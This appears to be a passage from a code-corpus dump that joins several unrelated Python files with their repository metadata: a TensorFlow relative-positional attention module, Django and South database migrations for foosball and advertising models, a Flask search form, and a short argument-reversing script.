raise NotImplementedError
# segment based attention score
if seg_mat is None:
seg_bias = 0
else:
# if FLAGS.verbose:
tf.logging.info("Compute rel-seg attn.")
seg_bias = rel_seg_bias(q_head, seg_mat, n_head, d_head, initializer,
func_mask=func_mask, dtype=tf_float)
# merge attention scores
attn_score = content_bias + pos_bias + seg_bias
# add extra attention score if provided
if attn_bias is not None:
# if FLAGS.verbose:
tf.logging.info("Attention bias shape: %s", attn_bias.shape)
attn_score += attn_bias * scale
# perform masking
if attn_mask is not None:
# if FLAGS.verbose:
tf.logging.info("Attention mask shape: %s", attn_mask.shape)
ret_dict["attn_mask"] = attn_mask
attn_score = attn_score - INF * tf.cast(attn_mask, attn_score.dtype)
# attention probability
attn_prob = safe_softmax(attn_score, -1)
ret_dict["attn_prob"] = attn_prob
attn_prob = dropout_op(attn_prob, dropatt, training=is_training, name=name+"/rel_attn_core")
# attention output
# print(attn_prob.get_shape(), v_head.get_shape())
if not check_tf_version():
attn_vec = tf.einsum("anij,ajnd->aind", attn_prob, v_head)
else:
attn_vec = tf.einsum("...nij,...jnd->...ind", attn_prob, v_head)
print(attn_prob.get_shape(), (v_head).get_shape(),
"==attn_core shape==", attn_vec.get_shape())
# things to monitor in attention
ret_dict["content_bias"] = content_bias
if pos_enc is not None:
ret_dict["pos_bias"] = pos_bias
if seg_mat is not None:
ret_dict["seg_bias"] = seg_bias
return attn_vec, ret_dict
def rel_multihead_attn(q, k, v, pos_enc, seg_mat, attn_mask, d_model, n_head,
d_head, dropout, dropatt, is_training, initializer,
attn_bias=None, func_mask=None, scope="rel_attn",
reuse=None, rel_attn_type="factorized",
name='rel_attn'):
"""Multi-head attention with relative positional encoding."""
ret_dict = {}
with tf.variable_scope(scope, reuse=reuse) as scope:
# attention core
attn_vec, attn_core_dict = rel_attn_core(
d_model, n_head, d_head, q, k, v, pos_enc, seg_mat, attn_mask,
attn_bias, dropatt, is_training, initializer, func_mask=func_mask,
rel_attn_type=rel_attn_type)
# post projection
attn_out = dense(attn_vec, d_model, initializer=initializer,
inp_shape=[n_head, d_head], scope="o")
attn_out = dropout_op(attn_out, dropout, training=is_training, name=name+"/rel_multihead_attn")
# residual + layer normalization
output, post_dict = residual_and_layer_norm(q, attn_out,
norm_shape=d_model)
# things to monitor
ret_dict = update_ret_dict(ret_dict, attn_core_dict)
ret_dict = update_ret_dict(ret_dict, post_dict)
return output, ret_dict
###############################################################################
##### relative positional attention ops
###############################################################################
def rel_shift(x, row_dim, klen=-1, shift=1):
"""Perform relative shift to form the relative attention score."""
ndims = x.shape.ndims
x_shape = tf.shape(x)
# Deal with negative indexing
if row_dim < 0:
row_dim = ndims + row_dim
assert row_dim >= 0
# Assume `col_dim` = `row_dim + 1`
col_dim = row_dim + 1
assert col_dim < ndims
tgt_shape_1, slice_begin_1, slice_len_1 = [], [], []
tgt_shape_2, slice_begin_2, slice_len_2 = [], [], []
for i in range(ndims):
slice_len_1.append(-1)
slice_begin_2.append(0)
if i == row_dim:
tgt_shape_1.append(x_shape[col_dim])
tgt_shape_2.append(x_shape[row_dim])
slice_begin_1.append(shift)
slice_len_2.append(-1)
elif i == col_dim:
tgt_shape_1.append(x_shape[row_dim])
tgt_shape_2.append(x_shape[col_dim] - shift)
slice_begin_1.append(0)
slice_len_2.append(klen)
else:
tgt_shape_1.append(x_shape[i])
tgt_shape_2.append(x_shape[i])
slice_begin_1.append(0)
slice_len_2.append(-1)
x = tf.reshape(x, tgt_shape_1)
x = tf.slice(x, slice_begin_1, slice_len_1)
x = tf.reshape(x, tgt_shape_2)
x = tf.slice(x, slice_begin_2, slice_len_2)
return x
def rel_pos_bias_gpu(q_head, pos_enc, d_model, n_head, d_head, klen,
initializer, func_mask=None, dtype=tf.float32):
"""Relative attention positional bias via relative shift for GPU."""
enc, shift = pos_enc
scale = tf.cast(1.0 / np.sqrt(d_head), dtype)
# parameters
r_r_bias = tf.get_variable("r_r_bias", [n_head, d_head],
dtype=dtype, initializer=initializer)
r_head = dense(enc, out_shape=[n_head, d_head], inp_shape=d_model,
initializer=initializer, scope="r", use_bias=False)
# [B x T x N x D]
if not check_tf_version():
pos_bias = tf.einsum("ainh,jnh->anij", q_head + r_r_bias * scale,
r_head)
else:
pos_bias = tf.einsum("...inh,jnh->...nij", q_head + r_r_bias * scale,
r_head)
print((q_head + r_r_bias * scale).get_shape(),
(r_head).get_shape(), "==rel_pos_bias_gpu shape==", pos_bias.get_shape())
pos_bias = rel_shift(pos_bias, -2, klen, shift)
if func_mask is not None:
pos_bias *= func_mask
return pos_bias
def rel_pos_bias(q_head, pos_enc, d_model, n_head, d_head, initializer,
func_mask=None, dtype=tf.float32):
"""Relative attention positional bias."""
# [(B) x T x D]
enc_q_1, enc_q_2, enc_k_1, enc_k_2 = pos_enc
# parameters
r_r_bias = tf.get_variable("r_r_bias", [n_head, d_head],
dtype=dtype, initializer=initializer)
r_kernel = tf.get_variable("r/kernel", [d_model, n_head, d_head],
dtype=dtype, initializer=initializer)
scale = tf.cast(1.0 / np.sqrt(d_head), dtype)
# [B x T x N x D]
# print((q_head + r_r_bias * scale).get_shape(), r_kernel.get_shape())
if not check_tf_version():
q_head_r = tf.einsum("ainh,dnh->aind", q_head + r_r_bias * scale,
r_kernel)
else:
q_head_r = tf.einsum("...inh,dnh->...ind", q_head + r_r_bias * scale,
r_kernel)
print((q_head + r_r_bias * scale).get_shape(),
(r_kernel).get_shape(), "==rel_pos_bias shape==", q_head_r.get_shape())
# [(B) x T x N x D]
q_head_r_1 = q_head_r * tf.expand_dims(enc_q_1, -2)
q_head_r_2 = q_head_r * tf.expand_dims(enc_q_2, -2)
# tf.logging.info("%s, %s, %s", q_head_r, q_head_r_1, q_head_r_2)
# [(B) x T x N x D]
prefix_k = get_einsum_prefix(enc_k_1.shape.ndims - 2)
if not check_tf_version():
einsum_str = "aind,{0}jd->anij".format(prefix_k)
else:
einsum_str = "...ind,{0}jd->...nij".format(prefix_k)
pos_bias = (tf.einsum(einsum_str, q_head_r_1, enc_k_1) +
tf.einsum(einsum_str, q_head_r_2, enc_k_2))
print((q_head_r_1).get_shape(),
(enc_k_1).get_shape(), "==rel_pos_bias shape==",
prefix_k, einsum_str, pos_bias.get_shape())
if func_mask is not None:
pos_bias *= func_mask
return pos_bias
def rel_seg_bias(q_head, seg_mat, n_head, d_head, initializer, func_mask=None,
dtype=tf.float32):
"""Relative attention segmentation bias."""
# Expand seg_mat: [... x N x T x T]
tgt_shape = []
for i in range(seg_mat.shape.ndims):
tgt_shape.append(tf.shape(seg_mat)[i])
tgt_shape.insert(-2, n_head)
seg_mat = tf.expand_dims(seg_mat, -3)
# Compute same / diff biases
r_s_bias = tf.get_variable("r_s_bias", [n_head, d_head],
dtype=dtype, initializer=initializer)
seg_embed = tf.get_variable("seg_embed", [2, n_head, d_head],
dtype=dtype, initializer=initializer)
scale = tf.cast(1.0 / np.sqrt(d_head), dtype)
q_head_s = q_head + r_s_bias * scale
# [... x N x T x 2]
if not check_tf_version():
seg_biases = tf.einsum("ainh,snh->anis", q_head_s, seg_embed)
else:
seg_biases = tf.einsum("...inh,snh->...nis", q_head_s, seg_embed)
print((q_head_s).get_shape(),
(seg_embed).get_shape(), "==rel_seg_bias shape==",
seg_biases.get_shape())
# Split into `diff` & `same`: [... x N x T x 1]
seg_bias_diff, seg_bias_same = tf.split(seg_biases, 2, axis=-1)
# Broadcast
seg_mat = tf.broadcast_to(seg_mat, tgt_shape)
seg_bias_diff = tf.broadcast_to(seg_bias_diff, tgt_shape)
seg_bias_same = tf.broadcast_to(seg_bias_same, tgt_shape)
seg_bias = tf.where(seg_mat, seg_bias_same, seg_bias_diff)
if func_mask is not None:
seg_bias *= func_mask
return seg_bias
def seg_id_to_mat(seg_q, seg_k, config):
"""Convert `seg_id` to `seg_mat`."""
if seg_q is None or seg_k is None:
return None
seg_mat = tf.equal(tf.expand_dims(seg_q, -1), tf.expand_dims(seg_k, -2))
# Treat [cls] as in the same segment as both A & B
cls_mat = tf.logical_or(
tf.expand_dims(tf.equal(seg_q, tf.constant([config.seg_id_cls], dtype=seg_q.dtype)), -1),
tf.expand_dims(tf.equal(seg_k, tf.constant([config.seg_id_cls], dtype=seg_k.dtype)), -2))
seg_mat = tf.logical_or(cls_mat, seg_mat)
return seg_mat
def get_pos_enc(pos_id_q, pos_id_k, d_model, dropout, is_training,
clamp_len=-1, dtype=tf.float32, name='pos_enc'):
"""Create inputs related to relative position encoding."""
pos_id_q = tf.cast(pos_id_q, dtype)
pos_id_k = tf.cast(pos_id_k, dtype)
if clamp_len > 0:
pos_id_q = tf.clamp(pos_id_q, -clamp_len, clamp_len)
pos_id_k = tf.clamp(pos_id_k, -clamp_len, clamp_len)
d_model_half = d_model // 2
freq_seq = tf.cast(tf.range(0, d_model_half, 1.0), dtype=dtype)
inv_freq = 1 / (10000 ** (freq_seq / d_model_half))
# print(pos_id_q.get_shape(), inv_freq.get_shape())
# sinusoid_q = tf.einsum("...i,d->...id", pos_id_q, inv_freq)
# sinusoid_k = tf.einsum("...i,d->...id", pos_id_k, inv_freq)
if not check_tf_version():
sinusoid_q = tf.einsum("i,d->id", pos_id_q, inv_freq)
sinusoid_k = tf.einsum("i,d->id", pos_id_k, inv_freq)
else:
sinusoid_q = tf.einsum("...i,d->...id", pos_id_q, inv_freq)
sinusoid_k = tf.einsum("...i,d->...id", pos_id_k, inv_freq)
print((pos_id_q).get_shape(),
(inv_freq).get_shape(), "==get_pos_enc shape==", sinusoid_q.get_shape())
print((pos_id_k).get_shape(),
(inv_freq).get_shape(), "==get_pos_enc shape==", sinusoid_k.get_shape())
sin_enc_q = tf.sin(sinusoid_q)
cos_enc_q = tf.cos(sinusoid_q)
sin_enc_q = dropout_op(sin_enc_q, dropout, training=is_training, name=name+"/pos_enc_sin")
cos_enc_q = dropout_op(cos_enc_q, dropout, training=is_training, name=name+"/pos_enc_cos")
sin_enc_k = tf.sin(sinusoid_k)
cos_enc_k = tf.cos(sinusoid_k)
enc_q_1 = tf.concat([sin_enc_q, sin_enc_q], axis=-1)
enc_k_1 = tf.concat([cos_enc_k, sin_enc_k], axis=-1)
enc_q_2 = tf.concat([cos_enc_q, cos_enc_q], axis=-1)
enc_k_2 = tf.concat([-sin_enc_k, cos_enc_k], axis=-1)
return [enc_q_1, enc_q_2, enc_k_1, enc_k_2]
def get_pos_enc_gpu(rel_pos_id, d_model, dropout, is_training,
clamp_len=-1, dtype=tf.float32, name='pos_enc'):
"""Create inputs related to relative position encoding."""
rel_pos_id = tf.cast(rel_pos_id, dtype)
if clamp_len > 0:
rel_pos_id = tf.clamp(rel_pos_id, -clamp_len, clamp_len)
d_model_half = d_model // 2
freq_seq = tf.cast(tf.range(0, d_model_half, 1.0), dtype=dtype)
inv_freq = 1 / (10000 ** (freq_seq / d_model_half))
if not check_tf_version():
sinusoid = tf.einsum("i,d->id", rel_pos_id, inv_freq)
else:
sinusoid = tf.einsum("...i,d->...id", rel_pos_id, inv_freq)
print((rel_pos_id).get_shape(),
(inv_freq).get_shape(), "==get_pos_enc shape==", sinusoid.get_shape())
sin_enc = tf.sin(sinusoid)
cos_enc = tf.cos(sinusoid)
sin_enc = dropout_op(sin_enc, dropout, training=is_training, name=name+"/pos_enc_sin")
cos_enc = dropout_op(cos_enc, dropout, training=is_training, name=name+"/pos_enc_cos")
pos_enc = tf.concat([sin_enc, cos_enc], axis=-1)
return pos_enc
|
[
"albert.xht@alibaba-inc.com"
] |
albert.xht@alibaba-inc.com
|
b22be2c324a03ef1cb8e0e9c9d174b469967778b
|
695af55893dd40f8e2effdd67bfdcfff9093ba69
|
/tfoosball/migrations/0012_member.py
|
4ab00f5415e2970f3cdaf0b73b93433df778845c
|
[] |
no_license
|
TeoTN/TFoosball-API
|
78cb702460017d1f9e6caa902c93bf576b8955cf
|
8ab8951662b1fb6ac126b31ff66f324936a0f2b8
|
refs/heads/master
| 2021-07-17T08:41:51.610291
| 2020-06-05T17:19:57
| 2020-06-05T19:01:19
| 67,066,305
| 0
| 1
| null | 2021-06-10T18:37:04
| 2016-08-31T19:17:40
|
Python
|
UTF-8
|
Python
| false
| false
| 1,513
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-02-05 22:14
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('tfoosball', '0011_team'),
]
operations = [
migrations.CreateModel(
name='Member',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=14)),
('exp', models.IntegerField(default=1000)),
('offence', models.IntegerField(default=0)),
('defence', models.IntegerField(default=0)),
('played', models.IntegerField(default=0)),
('win_streak', models.IntegerField(default=0)),
('curr_win_streak', models.IntegerField(default=0)),
('lose_streak', models.IntegerField(default=0)),
('curr_lose_streak', models.IntegerField(default=0)),
('lowest_exp', models.IntegerField(default=1000)),
('highest_exp', models.IntegerField(default=1000)),
('player', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('team', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tfoosball.Team')),
],
),
]
|
[
"staniowp@gmail.com"
] |
staniowp@gmail.com
|
e89b97449c4a586d8b6ceea9a3ece86b666a323b
|
7cf8c1d255b273be9352efa8bc386948991c6180
|
/forms.py
|
d603453da3c75e097a47317d3af5387287b22c89
|
[] |
no_license
|
RoopeKeto/book-recommender
|
90571fd4c8de3c5d6af03dd0009862121985f720
|
05526d128827ad44331e60239dd9c06d088e7c99
|
refs/heads/master
| 2022-07-07T05:39:13.063898
| 2019-07-28T10:21:31
| 2019-07-28T10:21:31
| 198,982,898
| 0
| 0
| null | 2022-06-21T22:24:20
| 2019-07-26T08:56:15
|
Python
|
UTF-8
|
Python
| false
| false
| 416
|
py
|
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField, IntegerField
from wtforms.validators import DataRequired, Length, NumberRange
class SearchForm(FlaskForm):
searchword = StringField('Search word',
validators=[DataRequired(), Length(min=1, max=200)],
)
search = SubmitField('Search')
|
[
"roope.keto@outlook.com"
] |
roope.keto@outlook.com
|
62a9d24b01c6842cb24bc2ee68676f65c52134bd
|
8274dc68727b53ec7b10e0b3f32f24427f5746ef
|
/intro-1.py
|
4fb0d414224e96f19d4cc4c278950732f3fdd75e
|
[] |
no_license
|
cristea-raul/py-plp-exercises
|
8108046bd9fefd82fcea726b2f80555796f3b640
|
5e0e1bc4bdf530243ca850ccfeb9dbcc501f4231
|
refs/heads/master
| 2021-01-16T21:17:48.861859
| 2015-05-27T17:28:43
| 2015-11-26T12:21:20
| 36,383,429
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 80
|
py
|
import sys
print(''.join([(arg[::-1]) + ' ' for arg in sys.argv[:0:-1]])[:-1])
|
[
"cristea.raul@gmail.com"
] |
cristea.raul@gmail.com
|
7d8a4669826bf427dd2777b62d5a2591bd63c94c
|
9b6f65a28af4c6befdd015d1416d6257138c0219
|
/alpha/advertising/migrations/0001_initial.py
|
ea66fae42001f4fef13a91de1a42f8757f91a575
|
[] |
no_license
|
dany431/cityfusion
|
5beec53131898e539a892249fa711fb3086fb53c
|
4e67464db69cfa21c965e4eb8796a5c727d5a443
|
refs/heads/master
| 2016-08-11T13:20:17.966539
| 2016-01-13T11:17:12
| 2016-01-13T11:17:12
| 49,567,611
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 23,799
|
py
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'AdvertisingType'
db.create_table(u'advertising_advertisingtype', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('width', self.gf('django.db.models.fields.IntegerField')()),
('height', self.gf('django.db.models.fields.IntegerField')()),
('cpm_price_currency', self.gf('djmoney.models.fields.CurrencyField')(default='CAD', max_length=3)),
('cpm_price', self.gf('djmoney.models.fields.MoneyField')(default='0.0', max_digits=10, decimal_places=2, default_currency='CAD')),
('cpc_price_currency', self.gf('djmoney.models.fields.CurrencyField')(default='CAD', max_length=3)),
('cpc_price', self.gf('djmoney.models.fields.MoneyField')(default='0.0', max_digits=10, decimal_places=2, default_currency='CAD')),
))
db.send_create_signal(u'advertising', ['AdvertisingType'])
# Adding model 'AdvertisingCampaign'
db.create_table(u'advertising_advertisingcampaign', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=128)),
('account', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['accounts.Account'])),
('all_of_canada', self.gf('django.db.models.fields.BooleanField')(default=False)),
('budget_currency', self.gf('djmoney.models.fields.CurrencyField')(default='CAD', max_length=3)),
('budget', self.gf('djmoney.models.fields.MoneyField')(default='0.0', max_digits=10, decimal_places=2, default_currency='CAD')),
('ammount_spent_currency', self.gf('djmoney.models.fields.CurrencyField')(default='CAD', max_length=3)),
('ammount_spent', self.gf('djmoney.models.fields.MoneyField')(default='0.0', max_digits=10, decimal_places=2, default_currency='CAD')),
('ammount_remaining_currency', self.gf('djmoney.models.fields.CurrencyField')(default='CAD', max_length=3)),
('ammount_remaining', self.gf('djmoney.models.fields.MoneyField')(default='0.0', max_digits=10, decimal_places=2, default_currency='CAD')),
('started', self.gf('django.db.models.fields.DateTimeField')()),
('ended', self.gf('django.db.models.fields.DateTimeField')(null=True, blank=True)),
))
db.send_create_signal(u'advertising', ['AdvertisingCampaign'])
# Adding M2M table for field regions on 'AdvertisingCampaign'
db.create_table(u'advertising_advertisingcampaign_regions', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('advertisingcampaign', models.ForeignKey(orm[u'advertising.advertisingcampaign'], null=False)),
('region', models.ForeignKey(orm[u'cities.region'], null=False))
))
db.create_unique(u'advertising_advertisingcampaign_regions', ['advertisingcampaign_id', 'region_id'])
# Adding model 'Advertising'
db.create_table(u'advertising_advertising', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('ad_type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['advertising.AdvertisingType'])),
('ad_company', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['advertising.AdvertisingCampaign'])),
('payment_type', self.gf('django.db.models.fields.CharField')(max_length=3)),
('ads_image', self.gf('django.db.models.fields.files.ImageField')(max_length=100)),
('reviewed', self.gf('django.db.models.fields.BooleanField')(default=False)),
('cpm_price_currency', self.gf('djmoney.models.fields.CurrencyField')(default='CAD', max_length=3)),
('cpm_price', self.gf('djmoney.models.fields.MoneyField')(default='0.0', max_digits=10, decimal_places=2, default_currency='CAD')),
('cpc_price_currency', self.gf('djmoney.models.fields.CurrencyField')(default='CAD', max_length=3)),
('cpc_price', self.gf('djmoney.models.fields.MoneyField')(default='0.0', max_digits=10, decimal_places=2, default_currency='CAD')),
))
db.send_create_signal(u'advertising', ['Advertising'])
def backwards(self, orm):
# Deleting model 'AdvertisingType'
db.delete_table(u'advertising_advertisingtype')
# Deleting model 'AdvertisingCampaign'
db.delete_table(u'advertising_advertisingcampaign')
# Removing M2M table for field regions on 'AdvertisingCampaign'
db.delete_table('advertising_advertisingcampaign_regions')
# Deleting model 'Advertising'
db.delete_table(u'advertising_advertising')
models = {
u'accounts.account': {
'Meta': {'object_name': 'Account'},
'about_me': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'access_token': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'blog_url': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'facebook_id': ('django.db.models.fields.BigIntegerField', [], {'unique': 'True', 'null': 'True', 'blank': 'True'}),
'facebook_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'facebook_open_graph': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'facebook_profile_url': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'in_the_loop_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'in_the_loop_phonenumber': ('phonenumber_field.modelfields.PhoneNumberField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'in_the_loop_with_email': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'in_the_loop_with_sms': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'in_the_loop_with_website': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'location': ('django.contrib.gis.db.models.fields.PointField', [], {'null': 'True', 'blank': 'True'}),
'mugshot': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'privacy': ('django.db.models.fields.CharField', [], {'default': "'registered'", 'max_length': '15'}),
'raw_data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'reminder_active_type': ('django.db.models.fields.CharField', [], {'default': "'HOURS'", 'max_length': '10'}),
'reminder_days_before_event': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'reminder_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'reminder_events': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['event.Event']", 'null': 'True', 'blank': 'True'}),
'reminder_hours_before_event': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'reminder_on_week_day': ('django.db.models.fields.CharField', [], {'default': '0', 'max_length': '1', 'null': 'True', 'blank': 'True'}),
'reminder_on_week_day_at_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}),
'reminder_phonenumber': ('phonenumber_field.modelfields.PhoneNumberField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'reminder_with_email': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'reminder_with_sms': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'reminder_with_website': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'my_profile'", 'unique': 'True', 'to': u"orm['auth.User']"}),
'venue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['event.Venue']", 'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.URLField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'website_url': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'})
},
u'advertising.advertising': {
'Meta': {'object_name': 'Advertising'},
'ad_company': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['advertising.AdvertisingCampaign']"}),
'ad_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['advertising.AdvertisingType']"}),
'ads_image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100'}),
'cpc_price': ('djmoney.models.fields.MoneyField', [], {'default': "'0.0'", 'max_digits': '10', 'decimal_places': '2', 'default_currency': "'CAD'"}),
'cpc_price_currency': ('djmoney.models.fields.CurrencyField', [], {'default': "'CAD'", 'max_length': '3'}),
'cpm_price': ('djmoney.models.fields.MoneyField', [], {'default': "'0.0'", 'max_digits': '10', 'decimal_places': '2', 'default_currency': "'CAD'"}),
'cpm_price_currency': ('djmoney.models.fields.CurrencyField', [], {'default': "'CAD'", 'max_length': '3'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'payment_type': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'reviewed': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
u'advertising.advertisingcampaign': {
'Meta': {'object_name': 'AdvertisingCampaign'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['accounts.Account']"}),
'all_of_canada': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'ammount_remaining': ('djmoney.models.fields.MoneyField', [], {'default': "'0.0'", 'max_digits': '10', 'decimal_places': '2', 'default_currency': "'CAD'"}),
'ammount_remaining_currency': ('djmoney.models.fields.CurrencyField', [], {'default': "'CAD'", 'max_length': '3'}),
'ammount_spent': ('djmoney.models.fields.MoneyField', [], {'default': "'0.0'", 'max_digits': '10', 'decimal_places': '2', 'default_currency': "'CAD'"}),
'ammount_spent_currency': ('djmoney.models.fields.CurrencyField', [], {'default': "'CAD'", 'max_length': '3'}),
'budget': ('djmoney.models.fields.MoneyField', [], {'default': "'0.0'", 'max_digits': '10', 'decimal_places': '2', 'default_currency': "'CAD'"}),
'budget_currency': ('djmoney.models.fields.CurrencyField', [], {'default': "'CAD'", 'max_length': '3'}),
'ended': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'regions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['cities.Region']", 'symmetrical': 'False'}),
'started': ('django.db.models.fields.DateTimeField', [], {})
},
u'advertising.advertisingtype': {
'Meta': {'object_name': 'AdvertisingType'},
'cpc_price': ('djmoney.models.fields.MoneyField', [], {'default': "'0.0'", 'max_digits': '10', 'decimal_places': '2', 'default_currency': "'CAD'"}),
'cpc_price_currency': ('djmoney.models.fields.CurrencyField', [], {'default': "'CAD'", 'max_length': '3'}),
'cpm_price': ('djmoney.models.fields.MoneyField', [], {'default': "'0.0'", 'max_digits': '10', 'decimal_places': '2', 'default_currency': "'CAD'"}),
'cpm_price_currency': ('djmoney.models.fields.CurrencyField', [], {'default': "'CAD'", 'max_length': '3'}),
'height': ('django.db.models.fields.IntegerField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'width': ('django.db.models.fields.IntegerField', [], {})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'cities.city': {
'Meta': {'object_name': 'City'},
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities.Country']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('django.contrib.gis.db.models.fields.PointField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'name_std': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'population': ('django.db.models.fields.IntegerField', [], {}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities.Region']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'subregion': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['cities.Subregion']", 'null': 'True', 'blank': 'True'})
},
u'cities.country': {
'Meta': {'ordering': "['name']", 'object_name': 'Country'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '2', 'db_index': 'True'}),
'continent': ('django.db.models.fields.CharField', [], {'max_length': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'db_index': 'True'}),
'population': ('django.db.models.fields.IntegerField', [], {}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'tld': ('django.db.models.fields.CharField', [], {'max_length': '5'})
},
u'cities.region': {
